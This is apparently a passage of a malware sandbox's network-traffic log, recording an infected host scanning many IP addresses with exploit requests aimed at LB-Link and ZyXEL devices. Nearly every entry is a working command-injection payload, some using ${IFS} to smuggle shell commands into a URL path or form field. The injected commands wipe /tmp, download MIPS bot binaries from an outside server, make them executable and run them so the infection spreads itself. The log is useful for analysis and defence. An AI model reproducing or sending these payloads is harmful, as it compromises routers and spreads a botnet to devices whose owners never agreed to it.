                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:41:56.248512030 CEST328INHTTP/1.1 400 Bad Request
                              Server: cloudflare
                              Date: Sun, 31 Mar 2024 06:41:56 GMT
                              Content-Type: text/html
                              Content-Length: 155
                              Connection: close
                              CF-RAY: -
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination Port
                              7122192.168.2.1336084150.105.228.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.179266930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7123192.168.2.1341132217.72.10.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.179302931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7124192.168.2.1333398159.113.24.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.179342031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7125192.168.2.1354642162.220.136.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.179373980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7126192.168.2.13328522.77.7.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.179439068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7127192.168.2.1360700136.78.174.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.179476023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7128192.168.2.1334800176.235.30.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.179524899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7129192.168.2.1346324159.100.10.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.179558039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7130192.168.2.133767879.75.56.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.179610014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7131192.168.2.1345562135.36.63.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.179662943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7132192.168.2.135683278.236.74.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.179713964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7133192.168.2.135123269.151.91.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.179764032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7134192.168.2.134844693.97.204.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.179791927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7135192.168.2.1352312212.56.85.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.179838896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7136192.168.2.1337690151.73.26.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.179887056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7137192.168.2.1339506129.105.159.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.179929018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7138192.168.2.1357264137.5.197.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.179975033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7139192.168.2.1358126145.43.217.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180001974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7140192.168.2.133780025.156.7.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180064917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7141192.168.2.1333542113.65.168.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180095911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7142192.168.2.1342068170.52.43.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180171967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7143192.168.2.134834020.40.31.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180203915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7144192.168.2.134277679.163.74.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180241108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7145192.168.2.1349926128.185.173.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180316925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7146192.168.2.1350054187.44.154.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180352926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7147192.168.2.134389042.1.134.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180394888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7148192.168.2.135825214.170.81.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180437088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7149192.168.2.134276460.35.128.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180452108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7150192.168.2.1358104139.129.173.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180478096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7151192.168.2.1354246154.164.113.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180529118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7152192.168.2.134422687.134.245.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180572987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7153192.168.2.1348714210.183.55.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180634022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7154192.168.2.1347364164.25.78.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180682898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7155192.168.2.133621053.229.108.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180738926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7156192.168.2.1345800162.253.252.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180763960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7157192.168.2.1337270158.11.200.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180818081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7158192.168.2.13474201.187.136.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180845976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7159192.168.2.1334234139.68.134.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180902958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7160192.168.2.134144442.97.189.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180936098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7161192.168.2.1354918161.187.207.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.180999994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7162192.168.2.133333442.60.149.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181032896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7163192.168.2.1356410136.255.254.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181097984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7164192.168.2.1339996112.123.213.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181134939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7165192.168.2.134235043.21.71.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181181908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7166192.168.2.1355064197.203.223.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181216002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7167192.168.2.133476217.100.63.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181288958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7168192.168.2.1342742177.142.160.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181324005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7169192.168.2.134685686.119.180.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181355953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7170192.168.2.1349094212.33.207.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181390047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7171192.168.2.1360636168.69.28.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181435108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7172192.168.2.1343418174.235.28.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181504011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7173192.168.2.1349758149.25.177.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181525946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7174192.168.2.1344490191.43.244.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181581020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7175192.168.2.1336674146.10.210.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181627035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7176192.168.2.1334686140.54.33.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181683064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7177192.168.2.13559609.245.224.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181729078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7178192.168.2.134733684.51.37.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181771040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7179192.168.2.1360308114.240.39.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181806087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7180192.168.2.135341491.52.124.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181824923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7181192.168.2.135696845.246.19.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181879044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7182192.168.2.1337884142.201.86.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181925058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7183192.168.2.133935498.25.88.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.181957960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7184192.168.2.135536814.174.80.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182032108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7185192.168.2.1341038117.227.84.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182089090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7186192.168.2.133314031.175.45.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.182112932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7187192.168.2.1337546211.63.209.187443
